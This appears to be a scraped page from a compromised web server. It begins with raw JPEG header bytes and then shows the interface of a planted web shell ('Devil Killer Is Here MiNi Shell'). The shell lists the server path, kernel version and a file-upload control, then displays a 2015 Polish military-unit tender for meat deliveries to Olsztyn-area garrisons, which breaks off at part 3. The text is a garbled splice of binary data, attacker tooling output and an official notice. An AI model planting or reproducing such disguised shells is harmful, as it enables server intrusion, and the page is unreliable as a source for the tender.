JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151112/304364-N-2015.html

<p class="kh_header"><b>Olsztyn: Dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego</b><br>
<b>Numer ogłoszenia: 304364 - 2015; data zamieszczenia: 12.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 3674 , ul. Saperska 1, 10-073 Olsztyn, woj. warmińsko-mazurskie, tel. 261 32 28 15, 261 32 23 66, faks 261 32 28 15, 261 32 34 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa- Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego  zwanych dalej środkami spożywczymi lub produktami, do garnizonu Olsztyn, Lidzbark Warmiński i Lipowiec powiat Szczytno, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Antrykot wołowy b/k kręg - 390 kg, Wołowina zrazowa b/k- 460 kg, Karkówka wieprzowa b/k 740 kg, Łopatka wieprzowa b/k- 720 kg, Schab wieprzowy b/k- 1080 kg, Żeberka wieprzowe- 320 kg, Szynka wieprzowa b/k- 560 kg, Mięso wieprzowe od szynki b/k drobne-640 kg, Golonka wieprzowa z/k- 200 kg, Golonka wieprzowa b/k - peklowana próżniowo- 200 kg,Wątroba wieprzowa- 100 kg, Pasztetowa- 110 kg, Salceson włoski- 90 kg. Salceson ozorkowy - 80 kg, Kaszanka z kaszy gryczanej- 130 kg, Kiełbasa szynkowa wołowa specjalna- 22 kg, Kiełbasa myśliwska- 190 kg, Kiełbasa jałowcowa- 190 kg, Kiełbasa parówkowa specjalna- 240 kg, Parówki specjalne- 260 kg, Mortadela specjalna- 140 kg, Kiełbasa biała parzona specjalna- 370 kg, Kiełbasa podlaska specjalna- 180 kg, Kiełbasa wojskowa specjalna- 160 kg, , Kiełbasa śląska specjalna - 260 kg, Kiełbasa toruńska specjalna- 370 kg, Kiełbasa zwyczajna specjalna- 470 kg, Kiełbasa krakowska parzona specjalna- 150 kg, Kiełbasa szynkowa wieprzowa specjalna- 150 kg, Kiełbasa krakowska sucha- 130 kg, Kiełbasa żywiecka- 220 kg, Kabanosy- 190 kg, Baleron- 180 kg, Polędwica wędzona wieprzowa- 90 kg, Polędwica wieprzowa sopocka- 60 kg, Szynka wieprzowa wędzona- 110 kg, Szynka wieprzowa gotowana- 110 kg, Szynka wieprzowa mielona- 120 kg, Szynka wieprzowa konserwowa- 130 kg, Boczek wędzony parzony b/k- 480 kg, Pasztet wieprzowy pieczony- 36 kg, Rolada z boczku- 26 kg, Golonka wieprzowa- 80 kg, Ogonówka- 70 kg, Kabanosy drobiowe- 36 kg, Kiełbasa szynkowa drobiowa-50 kg, Kiełbasa krakowska drobiowa 56 kg,  Parówki drobiowe 240 kg, Szynka drobiowa- 110 kg, Szynka z indyka -110 kg,Mortadela drobiowa -90 kg, Smalec wieprzowy- 430 kg, Słonina - 90 kg, Noga z kurczaka - 1080 kg, Filet z piersi kurczaka  - 840 kg, Filet z piersi indyka -110 kg, Wątroba z kurczaka - 120 kg, Żołądki kurczaka- 60 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych               w formularzu cenowym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.11.20.00-6, 12.13.11.35-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia oraz dokumentów: aktualnej decyzję Powiatowego Lekarza Weterynarii o zatwierdzeniu zakładu do produkcji lub obrotu, określającą rodzaj i zakres działalności, o której mowa w art. 20 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz.U. z 2006 r. nr 17, poz. 127 z późn. zm.) - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień, lub aktualnej decyzję Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu do wprowadzania do obrotu produktów pochodzenia niezwierzęcego, nieobjętego urzędową kontrolą organów Inspekcji Weterynaryjnej, określającą rodzaj i zakres działalności, o której mowa w art. 61 i 62 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia ( Dz z 2010 r. Nr 136, poz. 914, ze zm.), - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień, lub zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej, wydane na podstawie art. 62 ust. 1 pkt. 4 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia ( Dz z 2010 r. Nr 136, poz. 914, ze zm.) - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień (dotyczy podmiotów, o których mowa w art. 63 ust. 2 przywołanej ustawy )</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom zamawiającego, należy złożyć: 1.1. certyfikat systemu HACCP wystawiony przez niezależną , akredytowaną jednostkę certyfikującą; lub 1.2. zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub Inspekcji Weterynaryjnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP; przedłożone zaświadczenie winno potwierdzać, że Wykonawca wdrożył oraz stosuje Zasady systemu HACCP - Podstawa prawna art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r nr 136 poz. 914 z późn. zm.) lub 1.3. protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej, jako organ urzędowej kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymanie systemu HACCP na postawie art. 59 i 73 ustawy z dnia 25 sierpnia 2006 r. 2.W przypadku, gdy ofertę składa Wykonawca, który prowadzi działalność gospodarczą w zakresie pośrednictwa w sprzedaży żywności na odległość (sprzedaży wysyłkowej), w tym sprzedaży przez Internet, o której mowa w art. 63 ust. 2 pkt. 10 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. nr 136, poz. 914 z późn. zm.), Wykonawca przedstawi dokumenty o których mowa powyżej wydane dla podmiotów będących producentem zaoferowanych środków spożywczych będących przedmiotem zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany postanowień umowy mogą być dokonane przy wystąpieniu następujących uwarunkowań w zakresie:
1)	Zmiany stawki VAT w przypadku ich urzędowej zmiany;
2)	Zmiany ilości, częstotliwości dostaw do Odbiorców w przypadku konieczności dostosowania do aktualnych potrzeb Odbiorców limitów asortymentowych, poprzez dokonywanie korekt ilościowych w limitach między poszczególnymi Odbiorcami lub między poszczególnymi produktami. Zmiany nie mogą spowodować przekroczenia ogólnej ilości środków spożywczych oraz całkowitej wartości umowy określonej       w § 2 ust. 1.
W przypadku różnych cen środków spożywczych dla poszczególnych Odbiorców ceną obowiązującą będzie cena części, do której dokonano przesunięcia limitu.
3)	Wstrzymanie dostaw, z powodu braku produktu na rynku krajowym.
2.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JW 3674 Olsztyn, 10-073 Olsztyn ul. Saperska 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 09:00, miejsce: JW 3674 Olsztyn, ul. Saperska 1, w kancelarii jawnej, bud. nr 1, pok. 18, w dni robocze od. 7.30-14.30. Nie dopuszcza się składania ofert na biurze przepustek lub u oficera dyżurnego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  do Odbiorcy w miejscowości (garnizonie) Olsztyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego zwanych dalej środkami spożywczymi lub produktami, do garnizonu Olsztyn, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Antrykot wołowy b/k kręg - 200 kg, Wołowina zrazowa b/k- 60 kg, Karkówka wieprzowa b/k -400 kg, Łopatka wieprzowa b/k- 300 kg, Schab wieprzowy b/k- 500 kg, Żeberka wieprzowe- 100 kg, Szynka wieprzowa b/k- 300 kg, Mięso wieprzowe od szynki b/k drobne-400 kg, Golonka wieprzowa z/k- 50 kg, Golonka wieprzowa b/k - peklowana próżniowo- 100 kg,Wątroba wieprzowa- 40 kg, Pasztetowa- 20 kg, Salceson włoski- 20 kg. Salceson ozorkowy - 20 kg, Kaszanka z kaszy gryczanej- 20kg, Kiełbasa szynkowa wołowa specjalna- 6 kg, Kiełbasa myśliwska- 30 kg, Kiełbasa jałowcowa- 30 kg, Kiełbasa parówkowa specjalna- 20 kg, Parówki specjalne- 80 kg, Mortadela specjalna- 30 kg, Kiełbasa biała parzona specjalna- 50 kg, Kiełbasa podlaska specjalna- 40 kg, Kiełbasa wojskowa specjalna- 40 kg, , Kiełbasa śląska specjalna - 100 kg, Kiełbasa toruńska specjalna- 50 kg, Kiełbasa zwyczajna specjalna- 150 kg, Kiełbasa krakowska parzona specjalna- 50 kg, Kiełbasa szynkowa wieprzowa specjalna- 50 kg, Kiełbasa krakowska sucha- 20 kg, Kiełbasa żywiecka- 80 kg, Kabanosy- 20 kg, Baleron- 40 kg, Polędwica wędzona wieprzowa- 20 kg, Polędwica wieprzowa sopocka- 20 kg, Szynka wieprzowa wędzona- 30 kg, Szynka wieprzowa gotowana- 20 kg, Szynka wieprzowa mielona- 20 kg, Szynka wieprzowa konserwowa- 20 kg, Boczek wędzony parzony b/k- 200 kg, Pasztet wieprzowy pieczony- 10 kg, Rolada z boczku- 10 kg, Golonka wieprzowa- 20 kg, Ogonówka- 20 kg, Kabanosy drobiowe- 10 kg, Kiełbasa szynkowa drobiowa-20 kg, Kiełbasa krakowska drobiowa- 20 kg,  Parówki drobiowe - 30 kg, Szynka drobiowa- 20 kg, Szynka z indyka -20 kg, Mortadela drobiowa -20 kg, Smalec wieprzowy- 300 kg, Słonina - 50 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych   w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  do Odbiorcy w miejscowości (garnizonie)  Lidzbark Warmiński.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego zwanych dalej środkami spożywczymi lub produktami, do garnizonu, Lidzbark Warmiński, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Antrykot wołowy b/k kręg - 140 kg, Wołowina zrazowa b/k- 300 kg, Karkówka wieprzowa b/k -240 kg, Łopatka wieprzowa b/k- 320 kg, Schab wieprzowy b/k- 480 kg, Żeberka wieprzowe- 140 kg, Szynka wieprzowa b/k- 160 kg, Mięso wieprzowe od szynki b/k drobne-160 kg, Golonka wieprzowa z/k- 100 kg, Golonka wieprzowa b/k - peklowana próżniowo- 100 kg, Wątroba wieprzowa- 40 kg, Pasztetowa- 60 kg, Salceson włoski- 50 kg. Salceson ozorkowy - 40 kg, Kaszanka z kaszy gryczanej- 80 kg, Kiełbasa szynkowa wołowa specjalna- 10 kg, Kiełbasa myśliwska- 80 kg, Kiełbasa jałowcowa- 80 kg, Kiełbasa parówkowa specjalna- 140 kg, Parówki specjalne- 100 kg, Mortadela specjalna- 60 kg, Kiełbasa biała parzona specjalna- 240 kg, Kiełbasa podlaska specjalna- 60 kg, Kiełbasa wojskowa specjalna- 40 kg, , Kiełbasa śląska specjalna - 80 kg, Kiełbasa toruńska specjalna- 260 kg, Kiełbasa zwyczajna specjalna- 260 kg, Kiełbasa krakowska parzona specjalna- 40 kg, Kiełbasa szynkowa wieprzowa specjalna- 40 kg, Kiełbasa krakowska sucha- 60 kg, Kiełbasa żywiecka- 60 kg, Kabanosy- 90 kg, Baleron- 60 kg, Polędwica wędzona wieprzowa- 60 kg, Polędwica wieprzowa sopocka- 20 kg, Szynka wieprzowa wędzona- 40 kg, Szynka wieprzowa gotowana- 40kg, Szynka wieprzowa mielona- 50 kg, Szynka wieprzowa konserwowa- 60 kg, Boczek wędzony parzony b/k- 200 kg, Pasztet wieprzowy pieczony- 20 kg, Rolada z boczku- 10 kg, Golonka wieprzowa- 40 kg, Ogonówka- 30 kg, Kabanosy drobiowe- 20 kg, Kiełbasa szynkowa drobiowa-20 kg, Kiełbasa krakowska drobiowa- 30 kg,  Parówki drobiowe - 160 kg, Szynka drobiowa- 60 kg, Szynka z indyka -60 kg, Mortadela drobiowa -40 kg, Smalec wieprzowy- 100 kg, Słonina - 20 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych   w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  do Odbiorcy w miejscowości (garnizonie) Lipowiec, powiat Szczytno.</p>
